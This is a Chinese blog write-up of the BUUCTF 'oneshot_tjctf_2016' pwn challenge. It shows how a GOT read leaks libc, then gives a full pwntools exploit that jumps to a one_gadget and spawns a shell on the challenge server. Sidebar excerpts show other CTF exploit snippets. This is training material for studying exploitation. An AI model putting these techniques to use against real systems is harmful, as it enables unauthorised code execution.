[BUUCTF]PWN——oneshot_tjctf_2016(one_gadget)

最新推荐文章于 2024-04-09 10:25:59 发布
最新推荐文章于 2024-04-09 10:25:59 发布
阅读量876 收藏
点赞数
分类专栏: BUUCTF刷题记录 PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcmuyanga/article/details/113481435
版权

oneshot_tjctf_2016

附件

步骤

  1. 例行检查,64位程序,开启了nx
    在这里插入图片描述

  2. 本地试运行一下看看大概的情况
    在这里插入图片描述

  3. 64位ida载入
    在这里插入图片描述
    程序第8行会根据第7行的输入读取对应地址的值,第10行会跳转到输入的对应地址。

  4. 第10行会根据输入的地址跳转,首先想到的是让他跳转到去执行system(‘/bin/sh’),但是程序里没有现成的后门,想到尝试看看是否可以利用one_gadget。
    在这里插入图片描述

  5. 在那之前,要先知道程序里的偏移。根据之前分析,第8行会根据第7行的输入读取相应地址的值,我们可以在这点上利用puts@got来泄露libc,这样就能计算出程序的偏移了

elf = ELF('./oneshot_tjctf_2016')
puts_got = elf.got['puts']
p.sendlineafter('Read location?',str(puts_got))
p.recvuntil('value:')
pause()

在这里插入图片描述
得到puts函数地址后就可以计算偏移,算出one_gadget在程序中的地址了

libcbase = puts_addr - libc.symbols['puts']
onegadget = libcbase + one_gadget[0]

准备就绪,在第10行的输入点传入one_gadget的地址即可,有4个一个一个试吧,很幸运,第一个就可以

完整exp

from pwn import *
from LibcSearcher import * 
context.log_level ='debug'
 
elf = ELF('./oneshot_tjctf_2016')
#p = process('./oneshot_tjctf_2016')
p = remote('node3.buuoj.cn',25203)

libc = ELF('./libc-2.23-64.so')
one_gadget = [0x45216,0x4526a,0xf02a4,0xf1147]
 
puts_got = elf.got['puts']
p.sendlineafter('Read location?',str(puts_got))
p.recvuntil('0x')
#pause()
puts_addr = int(p.recvuntil('\n'),16)
print hex(puts_addr)
#pause() 

libcbase = puts_addr - libc.symbols['puts']
onegadget = libcbase + one_gadget[0]
 
p.sendline(str(onegadget)) 
 
p.interactive()

在这里插入图片描述

安装one_gadget
liucc09的博客
01-09 949
install 卸载已有ruby和one_gadget sudo gem uninstall one_gadget sudo apt remove gem ruby 安装ruby-install wget -O ruby-install-0.8.1.tar.gz https://github.com/postmodern/ruby-install/archive/v0.8.1.tar.gz tar -xzvf ruby-install-0.8.1.tar.gz cd ruby-install-0.
BUUCTF PWN get_started_3dsctf_2016
Rt1Text的博客
04-23 386
1.checksec +运行 32位/NX保护 2.32位IDA 1.main函数 gets()函数溢出 跟进v4看看偏移 offset=0x38 这个题有些不同,看看调用函数的汇编 该题没有用ebp寻址,用的是esp寻址 也就是说不需要覆盖ebp四字节 这就说明有时候后卡住回去仔细看看汇编 2.get_flag if ( a1 == 814536271 && a2 == 425138641 ) a1/a2满足条件即可得到flag.tx...
BUUCTF之“oneshot_tjctf_2016
Probeginner的博客
12-21 641
当做onegadget的复习
[BUUCTF]-PWN:oneshot_tjctf_2016解析(字符串输入,onegadget
2301_79326813的博客
03-02 289
查看保护查看ida这道题的大致思路就是泄露libc地址,然后用onegadget来getshell但是要注意,这里要我们输入的数据类型是long int,所以不能用我们常用的p64函数了。
oneshot_tjctf_2016
z1r0的博客
01-20 860
oneshot_tjctf_2016 查看保护 输入一个地址会跳到那个地址,再次输入会改那个地址 给got,改got为one_gadget即可。 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 25658) else: r = process(file
one_gadget
Trick的博客
11-27 584
[BJDCTF 2nd]one_gadget ida看main函数 再看init函数 会输出一个printf的地址 使用one_gadget,计算一下libc的基址 buuctf给了远程的libc文件,下载下来 one_gadget [libcfilename] exp: from pwn import * context.log_level='debug' p=remote('node3.buuoj.cn',25812) libc=ELF('./libc-2.29.so') p.recvunt
pwn学习笔记1】One_Shot(Linux Pwn
weixin_45927195的博客
02-22 237
防御机制 用checksec命令查看,发现有Canary和NX保护,即堆栈不可执行 伪代码 用64位ida打文件,查看main函数。 发现输入的全局变量name的下面就是flag,根据__isoc99_scanf("%32s",&name)可知变量name有32个字符,即0x20个。 exp ...
BUUCTF pwn——pwnable_orw
CNS-Enterprise BCC-1701-J
05-06 336
BUUCTF 做题练习
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 1061
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX启,我们考虑使用ROP,Canary没有打使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
one_gadget:在libc.so.6中找到一个小工具RCE的最佳工具
02-05
小工具 在进行ctf pwn挑战时,我们通常需要一个小工具RCE(远程代码执行),这会导致调用execve('/bin/sh', NULL, NULL) 。 这个宝石提供了这种小工具查找器,无需像傻瓜一样每次都使用objdump或IDA-pro :winking_face: 要使用此工具,请在命令行中键入one_gadget /path/to/libc并享受其中的魔力 :grinning_squinting_face: 安装 在RubyGems.org上可用! $ gem install one_gadget 注意:需要ruby版本> = 2.1.0,可以使用ruby --version进行检查。 支持的架构 i386 amd64(x86-64) a
buuctf——not_the_same_3dsctf_2016
qq_41560595的博客
03-26 530
这道题和前面分析过的get_started_3dsctf_2016差不多,换汤不换药。 选择一个地址0x080EB000,用来装shellcode。这个地址要改成可执行的。使用mprotect函数改变。 解题代码: from pwn import * #p=process("./not") p=remote("node3.buuoj.cn",29607) elf=ELF("./not") read=elf.symbols["read"] mprotect=elf.symbols["mprotect"] m
BUUCTF - PWN】ciscn_2019_c_1
古月浪子的博客
03-20 4175
checksec一下 IDA打看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
one_gadget使用
最新发布
Jingged的博客
04-09 1007
one_gadget是一个在二进制分析(尤其是利用分析)中常用的工具,它用于查找在给定二进制文件中可能存在的 "one-gadget" RCE(Remote Code Execution,远程代码执行)利用点。这些 "one-gadget" 通常指的是单个系统调用,当被正确利用时,能够直接赋予攻击者远程代码执行的能力,而无需链式利用多个漏洞。以下是使用one_gadget
[BUUCTF]PWN15——[BJDCTF 2nd]one_gadget
mcmuyanga的博客
08-30 440
[BUUCTF]PWN15——[BJDCTF 2nd]one_gadget 附件 步骤: 例行检查,64位,保护全 nc试运行一下程序,看看情况,它一始给了我们一个地址,然后让我们输入one gadget的地址 64位ida载入,shift+f12查看字符串,根据nc看到的字符串,找到关键函数 题目一始输出的是printf函数的地址,题目一始给了libc,知道了它的内存地址,就能够算出程序的偏移量了 print_addr=0x7fbe7e114830 offset=print_addr-li
CTF-Pwn-[BJDCTF 2nd]one_gadget的wp
wuyvle的博客
02-06 197
64位,放进ida看看 看一看这个main方法,要我们输入一个gadget,然后它回打印出来,再来看看init方法 用onegadget看看libc one_gadget libc-2.29.so 发现 写脚本 from pwn import * r=remote("node3.buuoj.cn",27772) elf=ELF("./one_gadget") libc=ELF('libc-2.29.so') one_gadget1=[0xe237f,0xe2383,0xe2386,0x106ef
one_gadget的安装与使用
weixin_62675330的博客
03-04 4359
0x0 始 当有了ROP_gadget之后就会发现one_gadget也是必须的。 没有ROP_gadget的赶快了。 ROP_gadget 下载安装与使用 one_gadget就是用来去查找动态链接库里execve("/bin/sh", rsp+0x70, environ)函数的地址的,专职。 one_gadget 是libc中存在的一些执行execve(“bin/sh",NULL,NULL)的片段。当我们知道libc的版本,并且通过信息泄露得到libc的基址,就可以通过控制EIP/RIP( 覆盖.go
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 463
buuctf-pwn 001-016题wp
ubuntu16.04 编译安装ruby环境、onegadget
Tw0的博客
01-24 1272
ubuntu16.04 安装one_gadget
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值